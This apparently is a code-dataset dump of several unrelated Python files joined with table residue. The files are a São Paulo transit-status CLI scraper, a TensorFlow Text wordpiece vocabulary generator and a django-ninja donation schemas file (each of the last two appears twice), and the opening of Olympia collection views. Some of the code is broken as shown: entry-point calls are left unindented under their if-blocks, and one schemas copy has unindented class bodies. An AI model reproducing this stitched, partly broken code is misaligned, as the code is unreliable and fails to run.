ANY KIND CONCERNING THE WORK, EXPRESS, IMPLIED, STATUTORY OR OTHERWISE,
INCLUDING WITHOUT LIMITATION WARRANTIES OF TITLE, MERCHANTABILITY, FITNESS FOR
A PARTICULAR PURPOSE, NON INFRINGEMENT, OR THE ABSENCE OF LATENT OR OTHER
DEFECTS, ACCURACY, OR THE PRESENT OR ABSENCE OF ERRORS, WHETHER OR NOT
DISCOVERABLE, ALL TO THE GREATEST EXTENT PERMISSIBLE UNDER APPLICABLE LAW.
For more information, please see
<http://creativecommons.org/publicdomain/zero/1.0/>
"""
class CLI:
    """Builds the tpsp argument parser and exposes argv parsing."""

    def __init__(self):
        # Service names are discovered from Service subclasses (cptm, metro).
        self.sources = list(Service.all())

        banner = textwrap.dedent(
            '''\
            {0}: {1}
            {0} (portuguese for "São Paulo public transportation")
            is a tiny command-line tool that tells you the current
            status of CPTM's and Metro lines.
            '''.format(PROGRAM_NAME, PROGRAM_DESCRIPTION)
        )
        footer = textwrap.dedent(
            '''\
            examples:
            $ {0} cptm
            # => shows the current state of all CPTM lines
            $ {0} metro --json
            # => shows the current state of all Metro lines and formats
            the output in JSON
            This is a Free and Open-Source Software (FOSS).
            Project page: <{1}>'''.format(PROGRAM_NAME, PROGRAM_URL)
        )

        self.parser = ArgumentParser(
            prog=PROGRAM_NAME,
            formatter_class=RawTextHelpFormatter,
            description=banner,
            epilog=footer,
        )

        # --------------------------------------------------
        self.parser.add_argument(
            'service',
            action='store',
            choices=self.sources,
            nargs=1,
            type=str,
            help='the public transportation service',
        )
        self.parser.add_argument(
            '-v', '--version',
            action='version',
            version='{0} ({1})'.format(PROGRAM_NAME, PROGRAM_VERSION),
            help='show the program version and exit',
        )
        self.parser.add_argument(
            '-j', '--json',
            action='store_true',
            dest='json',
            help='show the output in JSON format',
        )
        self.parser.add_argument(
            '--copyright',
            action=Copyright,
            nargs=0,
            help='show the copyright information and exit',
        )

    def act(self):
        """Parse sys.argv and return the resulting namespace."""
        return self.parser.parse_args()
class Copyright(Action):
    """argparse action: print the license text and exit successfully.

    Fix: the previous no-op ``__init__`` override only forwarded to
    ``super().__init__`` and has been removed; ``Action.__init__`` is
    inherited directly with identical behavior.
    """

    def __call__(self, parser, namespace, values, option_string=None):
        # Invoked by argparse when --copyright is seen; never returns.
        print(COPYRIGHT_INFO)
        sys.exit(0)
class Service:
    """Base class for transit scrapers; subclasses register by existing."""

    @staticmethod
    def all():
        """Return an iterator of lowercased names of all Service subclasses."""
        return (subclass.__name__.lower() for subclass in Service.__subclasses__())
class CPTM(Service):
    """Scrapes the status of each CPTM line from the company home page."""

    def __init__(self):
        self.url = 'https://www.cptm.sp.gov.br/Pages/Home.aspx'
        self.session = HTMLSession()

    def fetch_data(self):
        """Yield one {'line', 'status'} dict per known CPTM line."""
        response = self.session.get(self.url)
        # Each line has a CSS class named after the line's color.
        for ref in ['rubi', 'diamante', 'esmeralda', 'turquesa', 'coral', 'safira', 'jade']:
            element = response.html.find('.{0}'.format(ref), first=True)
            # The element text repeats the line name in caps; strip it out.
            yield {
                'line': ref.capitalize(),
                'status': element.text.replace(ref.upper(), ''),
            }
class METRO(Service):
    """Scrapes the status of each Metro line from the 'direto do Metro' page."""

    def __init__(self):
        self.url = 'http://www.metro.sp.gov.br/Sistemas/direto-do-metro-via4/diretodoMetroHome.aspx'
        self.session = HTMLSession()

    def fetch_data(self):
        """Yield one {'line', 'status'} dict per Metro line."""
        response = self.session.get(self.url)
        line_names = response.html.find('.{0}'.format('nomeDaLinha'))
        line_states = response.html.find('.{0}'.format('statusDaLinha'))
        for index, line_name in enumerate(line_names):
            # Names come as "<number>-<name>"; keep only the name part.
            yield {
                'line': line_name.text.split('-')[1].strip(),
                'status': line_states[index].text,
            }
class Output:
    """Renders fetched line data as a colorized table or a JSON document."""

    def __init__(self, data):
        # `data` is an iterable of {'line': ..., 'status': ...} dicts.
        self.data = data

    @property
    def table(self):
        """Colorized, human-readable table of line statuses."""
        def colorize(status):
            # First matching keyword wins; unknown statuses stay white.
            palette = (
                ('normal', Fore.GREEN),
                ('reduzida', Fore.YELLOW),
                ('paralisada', Fore.RED),
                ('encerrada', Style.DIM),
            )
            color = next((c for word, c in palette if word in status), Fore.WHITE)
            return '{}{}{}'.format(color, status.title(), Style.RESET_ALL)

        headers = [
            '{}{}{}'.format(Style.BRIGHT, col, Style.RESET_ALL)
            for col in ('Linha', 'Status')
        ]
        rows = [
            [entry['line'], colorize(entry['status'].lower())]
            for entry in self.data
        ]
        return tabulate(rows, headers=headers)

    @property
    def json(self):
        """JSON envelope ({code, data, message}) around the fetched rows."""
        payload = {'code': 200, 'data': list(self.data), 'message': 'success'}
        return json.dumps(payload, ensure_ascii=False, sort_keys=True, indent=4)
def main():
    """Entry point: parse args, fetch the chosen service's data, print it."""
    arguments = CLI().act()
    # Resolve the service class (CPTM / METRO) from this module by name.
    service_class = getattr(sys.modules[__name__], arguments.service[0].upper())
    try:
        report = Output(service_class().fetch_data())
        rendered = report.json if arguments.json else report.table
        print('\n{}'.format(rendered))
    except Exception as error:
        print('Could not fetch data\n')
        print(str(error))
        sys.exit(1)
if __name__ == '__main__':
main() | 0.406509 | 0.130009 |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tempfile
from absl import app
from absl import flags
import apache_beam as beam
import tensorflow.compat.v1 as tf
import tensorflow_transform as tft
import tensorflow_transform.beam as tft_beam
from tensorflow_transform.tf_metadata import dataset_metadata
from tensorflow_transform.tf_metadata import dataset_schema
from wordpiece_vocab import utils
from wordpiece_vocab import wordpiece_tokenizer_learner_lib as learner
FLAGS = flags.FLAGS
flags.DEFINE_string('data_file', None, 'The input data file path.')
flags.DEFINE_string('vocab_file', None, 'The output vocab file path.')
flags.DEFINE_string('metrics_file', None, 'The output metrics file path.')
flags.DEFINE_string(
'lang_set', 'en,es,ru,ar,de,fr,it,pt,ja,pl,fa,zh',
'Set of languages used to build wordpiece model, '
'given as a comma-separated list.')
flags.DEFINE_string('text_key', 'text', 'Text feature key in input examples.')
flags.DEFINE_string(
'language_code_key', 'language_code', 'Language code feature key.')
flags.DEFINE_float(
'smoothing_exponent', 0.5,
'Exponent used in calculating exponential smoothing coefficients.')
flags.DEFINE_integer('max_word_length', 50,
'Discard words of length greater than max_word_length.')
flags.DEFINE_integer('upper_thresh', 10000000,
'Upper threshold for binary search.')
flags.DEFINE_integer('lower_thresh', 10, 'Lower threshold for binary search.')
flags.DEFINE_integer('num_iterations', 4,
'Number of iterations in wordpiece learning algorithm.')
flags.DEFINE_integer('num_pad_tokens', 100, 'Number of padding tokens to '
'include in vocab.')
flags.DEFINE_integer('max_input_tokens', 5000000,
'Maximum number of input tokens, where -1 means no max.')
flags.DEFINE_integer('max_token_length', 50, 'Maximum length of a token.')
flags.DEFINE_integer('max_unique_chars', 1000,
'Maximum number of unique characters as tokens.')
flags.DEFINE_integer('vocab_size', 110000, 'Target size of generated vocab, '
'where vocab_size is an upper bound and the size of vocab '
'can be within slack_ratio less than the vocab_size.')
flags.DEFINE_float('slack_ratio', 0.05,
'Difference permitted between target and actual vocab size.')
flags.DEFINE_bool('include_joiner_token', True,
'Whether to include joiner token in word suffixes.')
flags.DEFINE_string('joiner', '##', 'Joiner token in word suffixes.')
flags.DEFINE_list('reserved_tokens',
['<unk>', '<s>', '</s>', '<mask>',
'<cls>', '<sep>', '<S>', '<T>'],
'Reserved tokens to be included in vocab.')
def generate_vocab(data_file, vocab_file, metrics_file, raw_metadata, params,
                   min_token_frequency=2):
  """Builds and runs the vocab-generation and vocab-metrics Beam pipelines.

  Two pipelines are executed sequentially: the first learns a wordpiece
  vocab from the corpus and writes it to `vocab_file`; the second re-reads
  the corpus, tokenizes it with the learned vocab, and writes per-language
  metrics to `metrics_file` as CSV.  Nothing is returned.

  Args:
    data_file: TFRecord file of serialized tf.train.Example protos to read.
    vocab_file: path in which to write the vocab.
    metrics_file: path in which to write the metrics CSV.
    raw_metadata: tf.Transform metadata describing the input schema.
    params: learner.Params for the wordpiece vocab learning algorithm.
    min_token_frequency: the min frequency for a token to be included.

  NOTE(review): also reads FLAGS directly (lang_set, text_key,
  language_code_key, smoothing_exponent, max_word_length, vocab_file), so
  behavior is not fully determined by the arguments alone.
  """
  lang_set = set(FLAGS.lang_set.split(','))
  # Schema to format metrics as CSV.
  csv_schema = dataset_schema.from_feature_spec({
      'lang': tf.FixedLenFeature([], tf.string),
      'sample_count': tf.FixedLenFeature([], tf.int64),
      'micro_drop_char_percent': tf.FixedLenFeature([], tf.string),
      'macro_drop_char_percent': tf.FixedLenFeature([], tf.string),
      'micro_compress_ratio': tf.FixedLenFeature([], tf.string),
      'macro_compress_ratio': tf.FixedLenFeature([], tf.string),
      'unweighted_en_wp_overlap_percent': tf.FixedLenFeature([], tf.string),
      'weighted_en_wp_overlap_percent': tf.FixedLenFeature([], tf.string),
  })
  # Column order for the CSV header and rows.
  columns = ['lang',
             'sample_count',
             'micro_drop_char_percent',
             'macro_drop_char_percent',
             'micro_compress_ratio',
             'macro_compress_ratio',
             'unweighted_en_wp_overlap_percent',
             'weighted_en_wp_overlap_percent']
  # Decodes serialized tf.Examples into TF Transform's dict representation.
  example_converter = tft.coders.ExampleProtoCoder(raw_metadata.schema,
                                                   serialized=False)

  def run_vocab():
    """Creates a pipeline to generate wordpiece vocab over a corpus."""
    vocab_pipeline = beam.Pipeline()
    with tft_beam.Context(temp_dir=tempfile.mkdtemp()):
      # Read raw data and convert to TF Transform encoded dict.
      raw_data = (
          vocab_pipeline
          | 'ReadInputData' >> beam.io.tfrecordio.ReadFromTFRecord(
              data_file, coder=beam.coders.ProtoCoder(tf.train.Example))
          | 'DecodeInputData' >> beam.Map(example_converter.decode))
      # Apply TF Transform.
      (transformed_data, _), _ = (
          (raw_data, raw_metadata)
          | 'FilterLangAndExtractToken' >> tft_beam.AnalyzeAndTransformDataset(
              utils.count_preprocessing_fn(FLAGS.text_key,
                                           FLAGS.language_code_key)))
      # Filter by languages.
      tokens = (
          transformed_data
          | 'FilterByLang' >> beam.ParDo(utils.FilterTokensByLang(lang_set)))
      # Calculate smoothing coefficients.
      coeffs = (
          tokens
          | 'CalculateSmoothingCoefficients' >> beam.CombineGlobally(
              utils.CalculateCoefficients(FLAGS.smoothing_exponent)))
      # Apply smoothing, aggregate counts, and sort words by count.
      # NOTE(review): the 'Flatten' step applies `x + '\n'` in a FlatMap;
      # this presumably relies on utils.LearnVocab emitting values that both
      # concatenate with '\n' and then flatten into writable lines -- confirm
      # against utils.LearnVocab before modifying this chain.
      _ = (
          tokens
          | 'ApplyExponentialSmoothing' >> beam.ParDo(
              utils.ExponentialSmoothing(), beam.pvalue.AsSingleton(coeffs))
          | 'SumCounts' >> beam.CombinePerKey(sum)
          | 'FilterLowCounts' >> beam.ParDo(utils.FilterByCount(
              FLAGS.max_word_length, min_token_frequency))
          | 'MergeAndSortCounts' >> beam.CombineGlobally(utils.SortByCount())
          | 'LearnVocab' >> beam.ParDo(utils.LearnVocab(params))
          | 'Flatten' >> beam.FlatMap(lambda x: x + '\n')
          | 'WriteVocab' >> beam.io.WriteToText(vocab_file,
                                                shard_name_template='',
                                                append_trailing_newlines=False))
    return vocab_pipeline

  def run_metrics():
    """Creates a pipeline to measure wordpiece vocab metrics over a corpus."""
    metrics_pipeline = beam.Pipeline()
    with tft_beam.Context(temp_dir=tempfile.mkdtemp()):
      # Read raw data and convert to TF Transform encoded dict.
      raw_data = (
          metrics_pipeline
          | 'ReadInputData' >> beam.io.tfrecordio.ReadFromTFRecord(
              data_file, coder=beam.coders.ProtoCoder(tf.train.Example))
          | 'DecodeInputData' >> beam.Map(example_converter.decode))
      # Apply transform to wordpiece-tokenize input.
      # NOTE(review): tokenization reads FLAGS.vocab_file rather than the
      # `vocab_file` argument -- the two must point at the same path.
      (metrics_transformed_data, _), _ = (
          (raw_data, raw_metadata)
          | 'WordpieceTokenizeInput' >> tft_beam.AnalyzeAndTransformDataset(
              utils.metrics_preprocessing_fn(FLAGS.vocab_file,
                                             FLAGS.text_key,
                                             FLAGS.language_code_key)))
      # Initialize CSV coder. Aggregate values for each lang, calculate metrics,
      # and write to output to a CSV file.
      csv_converter = tft.coders.CsvCoder(columns, csv_schema)
      _ = (
          metrics_transformed_data
          | 'CompileTokenInfo' >> beam.ParDo(utils.CompileTokenizationInfo())
          | 'CombineStatsForLang' >> beam.CombineGlobally(utils.AggregateLang())
          | 'CalculateMetrics' >> beam.ParDo(utils.CalculateMetrics())
          | 'EncodeMetrics' >> beam.Map(csv_converter.encode)
          | 'WriteMetrics' >> beam.io.WriteToText(
              metrics_file, shard_name_template='', header=','.join(columns)))
    return metrics_pipeline

  # Run the vocab pipeline to completion before the metrics pipeline starts,
  # since the metrics pipeline depends on the written vocab file.
  vocab_pipeline = run_vocab()
  vocab_pipeline.run().wait_until_finish()
  metrics_pipeline = run_metrics()
  metrics_pipeline.run().wait_until_finish()
def main(_):
  """Program entry point: build the schema and params, then generate vocab."""
  # Input tf.Examples carry the raw text plus its language code.
  raw_metadata = dataset_metadata.DatasetMetadata(
      dataset_schema.from_feature_spec({
          'text': tf.FixedLenFeature([], tf.string),
          'language_code': tf.FixedLenFeature([], tf.string),
      }))

  # Prepend '<pad>', '<pad1>', ..., '<padN-1>' so models can reserve ids.
  reserved = FLAGS.reserved_tokens
  if FLAGS.num_pad_tokens:
    padding = ['<pad>']
    padding.extend('<pad%d>' % i for i in range(1, FLAGS.num_pad_tokens))
    reserved = padding + reserved

  params = learner.Params(FLAGS.upper_thresh, FLAGS.lower_thresh,
                          FLAGS.num_iterations, FLAGS.max_input_tokens,
                          FLAGS.max_token_length, FLAGS.max_unique_chars,
                          FLAGS.vocab_size, FLAGS.slack_ratio,
                          FLAGS.include_joiner_token, FLAGS.joiner,
                          reserved)
  generate_vocab(FLAGS.data_file, FLAGS.vocab_file, FLAGS.metrics_file,
                 raw_metadata, params)
if __name__ == '__main__':
app.run(main) | third_party/tensorflow-text/src/tools/wordpiece_vocab/generate_vocab.py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tempfile
from absl import app
from absl import flags
import apache_beam as beam
import tensorflow.compat.v1 as tf
import tensorflow_transform as tft
import tensorflow_transform.beam as tft_beam
from tensorflow_transform.tf_metadata import dataset_metadata
from tensorflow_transform.tf_metadata import dataset_schema
from wordpiece_vocab import utils
from wordpiece_vocab import wordpiece_tokenizer_learner_lib as learner
FLAGS = flags.FLAGS
flags.DEFINE_string('data_file', None, 'The input data file path.')
flags.DEFINE_string('vocab_file', None, 'The output vocab file path.')
flags.DEFINE_string('metrics_file', None, 'The output metrics file path.')
flags.DEFINE_string(
'lang_set', 'en,es,ru,ar,de,fr,it,pt,ja,pl,fa,zh',
'Set of languages used to build wordpiece model, '
'given as a comma-separated list.')
flags.DEFINE_string('text_key', 'text', 'Text feature key in input examples.')
flags.DEFINE_string(
'language_code_key', 'language_code', 'Language code feature key.')
flags.DEFINE_float(
'smoothing_exponent', 0.5,
'Exponent used in calculating exponential smoothing coefficients.')
flags.DEFINE_integer('max_word_length', 50,
'Discard words of length greater than max_word_length.')
flags.DEFINE_integer('upper_thresh', 10000000,
'Upper threshold for binary search.')
flags.DEFINE_integer('lower_thresh', 10, 'Lower threshold for binary search.')
flags.DEFINE_integer('num_iterations', 4,
'Number of iterations in wordpiece learning algorithm.')
flags.DEFINE_integer('num_pad_tokens', 100, 'Number of padding tokens to '
'include in vocab.')
flags.DEFINE_integer('max_input_tokens', 5000000,
'Maximum number of input tokens, where -1 means no max.')
flags.DEFINE_integer('max_token_length', 50, 'Maximum length of a token.')
flags.DEFINE_integer('max_unique_chars', 1000,
'Maximum number of unique characters as tokens.')
flags.DEFINE_integer('vocab_size', 110000, 'Target size of generated vocab, '
'where vocab_size is an upper bound and the size of vocab '
'can be within slack_ratio less than the vocab_size.')
flags.DEFINE_float('slack_ratio', 0.05,
'Difference permitted between target and actual vocab size.')
flags.DEFINE_bool('include_joiner_token', True,
'Whether to include joiner token in word suffixes.')
flags.DEFINE_string('joiner', '##', 'Joiner token in word suffixes.')
flags.DEFINE_list('reserved_tokens',
['<unk>', '<s>', '</s>', '<mask>',
'<cls>', '<sep>', '<S>', '<T>'],
'Reserved tokens to be included in vocab.')
def generate_vocab(data_file, vocab_file, metrics_file, raw_metadata, params,
                   min_token_frequency=2):
  """Builds and runs the vocab-generation and vocab-metrics Beam pipelines.

  Two pipelines are executed sequentially: the first learns a wordpiece
  vocab from the corpus and writes it to `vocab_file`; the second re-reads
  the corpus, tokenizes it with the learned vocab, and writes per-language
  metrics to `metrics_file` as CSV.  Nothing is returned.

  Args:
    data_file: TFRecord file of serialized tf.train.Example protos to read.
    vocab_file: path in which to write the vocab.
    metrics_file: path in which to write the metrics CSV.
    raw_metadata: tf.Transform metadata describing the input schema.
    params: learner.Params for the wordpiece vocab learning algorithm.
    min_token_frequency: the min frequency for a token to be included.

  NOTE(review): also reads FLAGS directly (lang_set, text_key,
  language_code_key, smoothing_exponent, max_word_length, vocab_file), so
  behavior is not fully determined by the arguments alone.
  """
  lang_set = set(FLAGS.lang_set.split(','))
  # Schema to format metrics as CSV.
  csv_schema = dataset_schema.from_feature_spec({
      'lang': tf.FixedLenFeature([], tf.string),
      'sample_count': tf.FixedLenFeature([], tf.int64),
      'micro_drop_char_percent': tf.FixedLenFeature([], tf.string),
      'macro_drop_char_percent': tf.FixedLenFeature([], tf.string),
      'micro_compress_ratio': tf.FixedLenFeature([], tf.string),
      'macro_compress_ratio': tf.FixedLenFeature([], tf.string),
      'unweighted_en_wp_overlap_percent': tf.FixedLenFeature([], tf.string),
      'weighted_en_wp_overlap_percent': tf.FixedLenFeature([], tf.string),
  })
  # Column order for the CSV header and rows.
  columns = ['lang',
             'sample_count',
             'micro_drop_char_percent',
             'macro_drop_char_percent',
             'micro_compress_ratio',
             'macro_compress_ratio',
             'unweighted_en_wp_overlap_percent',
             'weighted_en_wp_overlap_percent']
  # Decodes serialized tf.Examples into TF Transform's dict representation.
  example_converter = tft.coders.ExampleProtoCoder(raw_metadata.schema,
                                                   serialized=False)

  def run_vocab():
    """Creates a pipeline to generate wordpiece vocab over a corpus."""
    vocab_pipeline = beam.Pipeline()
    with tft_beam.Context(temp_dir=tempfile.mkdtemp()):
      # Read raw data and convert to TF Transform encoded dict.
      raw_data = (
          vocab_pipeline
          | 'ReadInputData' >> beam.io.tfrecordio.ReadFromTFRecord(
              data_file, coder=beam.coders.ProtoCoder(tf.train.Example))
          | 'DecodeInputData' >> beam.Map(example_converter.decode))
      # Apply TF Transform.
      (transformed_data, _), _ = (
          (raw_data, raw_metadata)
          | 'FilterLangAndExtractToken' >> tft_beam.AnalyzeAndTransformDataset(
              utils.count_preprocessing_fn(FLAGS.text_key,
                                           FLAGS.language_code_key)))
      # Filter by languages.
      tokens = (
          transformed_data
          | 'FilterByLang' >> beam.ParDo(utils.FilterTokensByLang(lang_set)))
      # Calculate smoothing coefficients.
      coeffs = (
          tokens
          | 'CalculateSmoothingCoefficients' >> beam.CombineGlobally(
              utils.CalculateCoefficients(FLAGS.smoothing_exponent)))
      # Apply smoothing, aggregate counts, and sort words by count.
      # NOTE(review): the 'Flatten' step applies `x + '\n'` in a FlatMap;
      # this presumably relies on utils.LearnVocab emitting values that both
      # concatenate with '\n' and then flatten into writable lines -- confirm
      # against utils.LearnVocab before modifying this chain.
      _ = (
          tokens
          | 'ApplyExponentialSmoothing' >> beam.ParDo(
              utils.ExponentialSmoothing(), beam.pvalue.AsSingleton(coeffs))
          | 'SumCounts' >> beam.CombinePerKey(sum)
          | 'FilterLowCounts' >> beam.ParDo(utils.FilterByCount(
              FLAGS.max_word_length, min_token_frequency))
          | 'MergeAndSortCounts' >> beam.CombineGlobally(utils.SortByCount())
          | 'LearnVocab' >> beam.ParDo(utils.LearnVocab(params))
          | 'Flatten' >> beam.FlatMap(lambda x: x + '\n')
          | 'WriteVocab' >> beam.io.WriteToText(vocab_file,
                                                shard_name_template='',
                                                append_trailing_newlines=False))
    return vocab_pipeline

  def run_metrics():
    """Creates a pipeline to measure wordpiece vocab metrics over a corpus."""
    metrics_pipeline = beam.Pipeline()
    with tft_beam.Context(temp_dir=tempfile.mkdtemp()):
      # Read raw data and convert to TF Transform encoded dict.
      raw_data = (
          metrics_pipeline
          | 'ReadInputData' >> beam.io.tfrecordio.ReadFromTFRecord(
              data_file, coder=beam.coders.ProtoCoder(tf.train.Example))
          | 'DecodeInputData' >> beam.Map(example_converter.decode))
      # Apply transform to wordpiece-tokenize input.
      # NOTE(review): tokenization reads FLAGS.vocab_file rather than the
      # `vocab_file` argument -- the two must point at the same path.
      (metrics_transformed_data, _), _ = (
          (raw_data, raw_metadata)
          | 'WordpieceTokenizeInput' >> tft_beam.AnalyzeAndTransformDataset(
              utils.metrics_preprocessing_fn(FLAGS.vocab_file,
                                             FLAGS.text_key,
                                             FLAGS.language_code_key)))
      # Initialize CSV coder. Aggregate values for each lang, calculate metrics,
      # and write to output to a CSV file.
      csv_converter = tft.coders.CsvCoder(columns, csv_schema)
      _ = (
          metrics_transformed_data
          | 'CompileTokenInfo' >> beam.ParDo(utils.CompileTokenizationInfo())
          | 'CombineStatsForLang' >> beam.CombineGlobally(utils.AggregateLang())
          | 'CalculateMetrics' >> beam.ParDo(utils.CalculateMetrics())
          | 'EncodeMetrics' >> beam.Map(csv_converter.encode)
          | 'WriteMetrics' >> beam.io.WriteToText(
              metrics_file, shard_name_template='', header=','.join(columns)))
    return metrics_pipeline

  # Run the vocab pipeline to completion before the metrics pipeline starts,
  # since the metrics pipeline depends on the written vocab file.
  vocab_pipeline = run_vocab()
  vocab_pipeline.run().wait_until_finish()
  metrics_pipeline = run_metrics()
  metrics_pipeline.run().wait_until_finish()
def main(_):
  """Program entry point: build the schema and params, then generate vocab."""
  # Input tf.Examples carry the raw text plus its language code.
  raw_metadata = dataset_metadata.DatasetMetadata(
      dataset_schema.from_feature_spec({
          'text': tf.FixedLenFeature([], tf.string),
          'language_code': tf.FixedLenFeature([], tf.string),
      }))

  # Prepend '<pad>', '<pad1>', ..., '<padN-1>' so models can reserve ids.
  reserved = FLAGS.reserved_tokens
  if FLAGS.num_pad_tokens:
    padding = ['<pad>']
    padding.extend('<pad%d>' % i for i in range(1, FLAGS.num_pad_tokens))
    reserved = padding + reserved

  params = learner.Params(FLAGS.upper_thresh, FLAGS.lower_thresh,
                          FLAGS.num_iterations, FLAGS.max_input_tokens,
                          FLAGS.max_token_length, FLAGS.max_unique_chars,
                          FLAGS.vocab_size, FLAGS.slack_ratio,
                          FLAGS.include_joiner_token, FLAGS.joiner,
                          reserved)
  generate_vocab(FLAGS.data_file, FLAGS.vocab_file, FLAGS.metrics_file,
                 raw_metadata, params)
if __name__ == '__main__':
app.run(main) | 0.887741 | 0.169234 |
import datetime
import typing
from datetime import date
from typing import List, Optional
from ninja import Field, Schema
from pydantic import EmailStr
from share import choices, states
class OrganizationSummary(Schema):
    """Compact organization view embedded in grouped listings."""
    id: int
    type: str
    name: str
    city: choices.Cities


class DonationCreation(Schema):
    """Payload for creating a donation against a required item."""
    # id of the required item being donated to.
    id: int
    amount: int
    # NOTE(review): field name looks like a typo for "expected_delivery_date",
    # but renaming it would break the API contract.
    excepted_delivery_date: Optional[date]


class DonationModification(Schema):
    """Payload applying a state-machine event to a donation."""
    id: int = 0
    # Incoming JSON field is "event"; exposed internally as `name`.
    name: states.EventEnum = Field(..., alias="event")
    comment: str = ""


class Donation(Schema):
    """Donation as returned to API clients."""
    id: int
    # Populated from the source attribute `required_item_name`.
    required_item: str = Field(..., alias="required_item_name")
    amount: int
    state: states.DonationStateEnum
    created_at: datetime.datetime
    modified_at: datetime.datetime
class RequiredItemBase(Schema):
    """Fields shared by required-item creation and read models."""
    name: str
    amount: int
    unit: choices.Units
    ended_date: date


class RequiredItemCreation(RequiredItemBase):
    """Creation payload; identical to the base fields."""
    pass


class RequiredItem(RequiredItemBase):
    """Required-item read model, including donation progress."""
    # NOTE(review): `id` is str here while the other models use int --
    # confirm whether this mismatch is intentional.
    id: str
    state: states.RequiredItemStateEnum
    approved_amount: int
    delivered_amount: int
    donations: List[Donation]


class GroupedRequiredItems(Schema):
    """Required items grouped under their owning organization."""
    organization: OrganizationSummary
    items: List[RequiredItem] = []
class OrganizationBase(Schema):
    """Contact and classification fields shared by organization models."""
    name: str
    type: choices.OrganizationTypes
    # Free-form description, presumably used when `type` is "other" -- confirm.
    type_other: str
    city: choices.Cities
    address: str
    phone: str
    office_hours: str
    other_contact_method: choices.ContactMethods
    other_contact: str


class Organization(OrganizationBase):
    """Organization read model."""
    id: int


class OrganizationCreation(OrganizationBase):
    """Sign-up payload: organization profile plus account credentials."""
    username: str
    password: str
    # Presumably checked against `password` by the handler -- confirm.
    confirmed_password: str
    email: EmailStr
class DonatorBase(Schema):
    """Contact fields shared by donator models."""
    phone: str
    other_contact_method: choices.ContactMethods
    other_contact: str


class DonatorCreation(DonatorBase):
    """Donator sign-up payload."""
    email: EmailStr


class Donator(DonatorBase):
    """Donator read model."""
    id: int


class SetDonationResult(Schema):
    """Outcome of a donation change: a message and/or the updated donation."""
    message: Optional[str] = None
    donation: Optional[Donation] = None


class UserMe(Schema):
    """Current-user profile."""
    name: str
    email: str = ""
    phone: str = ""
    other_contact_method: str = ""
    # The trailing "| share/schemas.py | import datetime" text on the final
    # line is dataset-export residue, kept verbatim.
    other_contact: str = "" | share/schemas.py | import datetime
import typing
from datetime import date
from typing import List, Optional
from ninja import Field, Schema
from pydantic import EmailStr
from share import choices, states
class OrganizationSummary(Schema):
    """Compact organization view embedded in grouped listings."""
    id: int
    type: str
    name: str
    city: choices.Cities


class DonationCreation(Schema):
    """Payload for creating a donation against a required item."""
    # id of the required item being donated to.
    id: int
    amount: int
    # NOTE(review): field name looks like a typo for "expected_delivery_date",
    # but renaming it would break the API contract.
    excepted_delivery_date: Optional[date]


class DonationModification(Schema):
    """Payload applying a state-machine event to a donation."""
    id: int = 0
    # Incoming JSON field is "event"; exposed internally as `name`.
    name: states.EventEnum = Field(..., alias="event")
    comment: str = ""


class Donation(Schema):
    """Donation as returned to API clients."""
    id: int
    # Populated from the source attribute `required_item_name`.
    required_item: str = Field(..., alias="required_item_name")
    amount: int
    state: states.DonationStateEnum
    created_at: datetime.datetime
    modified_at: datetime.datetime
class RequiredItemBase(Schema):
name: str
amount: int
unit: choices.Units
ended_date: date
class RequiredItemCreation(RequiredItemBase):
pass
class RequiredItem(RequiredItemBase):
id: str
state: states.RequiredItemStateEnum
approved_amount: int
delivered_amount: int
donations: typing.List[Donation]
class GroupedRequiredItems(Schema):
organization: OrganizationSummary
items: List[RequiredItem] = []
class OrganizationBase(Schema):
name: str
type: choices.OrganizationTypes
type_other: str
city: choices.Cities
address: str
phone: str
office_hours: str
other_contact_method: choices.ContactMethods
other_contact: str
class Organization(OrganizationBase):
id: int
class OrganizationCreation(OrganizationBase):
username: str
password: str
confirmed_password: str
email: EmailStr
class DonatorBase(Schema):
phone: str
other_contact_method: choices.ContactMethods
other_contact: str
class DonatorCreation(DonatorBase):
email: EmailStr
class Donator(DonatorBase):
id: int
class SetDonationResult(Schema):
message: typing.Optional[str] = None
donation: typing.Optional[Donation] = None
class UserMe(Schema):
name: str
email: str = ""
phone: str = ""
other_contact_method: str = ""
other_contact: str = "" | 0.772058 | 0.229508 |
import functools
import hashlib
import os
from django import http
from django.core.cache import cache
from django.core.exceptions import PermissionDenied
from django.db.models import Q
from django.db.transaction import non_atomic_requests
from django.shortcuts import get_object_or_404, redirect
from django.views.decorators.http import require_POST
from django.views.decorators.csrf import csrf_protect
from django.utils.translation import ugettext_lazy as _lazy, ugettext as _
import caching.base as caching
import commonware.log
from django_statsd.clients import statsd
from olympia import amo
from olympia.amo import messages
from olympia.amo.decorators import (
allow_mine, json_view, login_required, post_required, restricted_content,
write)
from olympia.amo.urlresolvers import reverse
from olympia.amo.utils import paginate, urlparams, render
from olympia.access import acl
from olympia.accounts.utils import redirect_for_login
from olympia.addons.models import Addon
from olympia.addons.views import BaseFilter
from olympia.legacy_api.utils import addon_to_dict
from olympia.tags.models import Tag
from olympia.translations.query import order_by_translation
from olympia.users.models import UserProfile
from .models import (
Collection, CollectionAddon, CollectionWatcher, CollectionVote,
SPECIAL_SLUGS)
from . import forms, tasks
log = commonware.log.getLogger('z.collections')
@non_atomic_requests
def get_collection(request, username, slug):
if (slug in SPECIAL_SLUGS.values() and request.user.is_authenticated() and
request.user.username == username):
return getattr(request.user, slug + '_collection')()
else:
return get_object_or_404(Collection.objects,
author__username=username, slug=slug)
def owner_required(f=None, require_owner=True):
"""Requires collection to be owned, by someone."""
def decorator(func):
@functools.wraps(func)
def wrapper(request, username, slug, *args, **kw):
collection = get_collection(request, username, slug)
if acl.check_collection_ownership(request, collection,
require_owner=require_owner):
return func(request, collection, username, slug, *args, **kw)
else:
raise PermissionDenied
return wrapper
return decorator(f) if f else decorator
@non_atomic_requests
def legacy_redirect(request, uuid, edit=False):
# Nicknames have a limit of 30, so len == 36 implies a uuid.
key = 'uuid' if len(uuid) == 36 else 'nickname'
c = get_object_or_404(Collection.objects, **{key: uuid})
if edit:
return http.HttpResponseRedirect(c.edit_url())
to = c.get_url_path() + '?' + request.GET.urlencode()
return http.HttpResponseRedirect(to)
@non_atomic_requests
def legacy_directory_redirects(request, page):
sorts = {'editors_picks': 'featured', 'popular': 'popular',
'users': 'followers'}
loc = base = reverse('collections.list')
if page in sorts:
loc = urlparams(base, sort=sorts[page])
elif request.user.is_authenticated():
if page == 'mine':
loc = reverse('collections.user', args=[request.user.username])
elif page == 'favorites':
loc = reverse('collections.following')
return http.HttpResponseRedirect(loc)
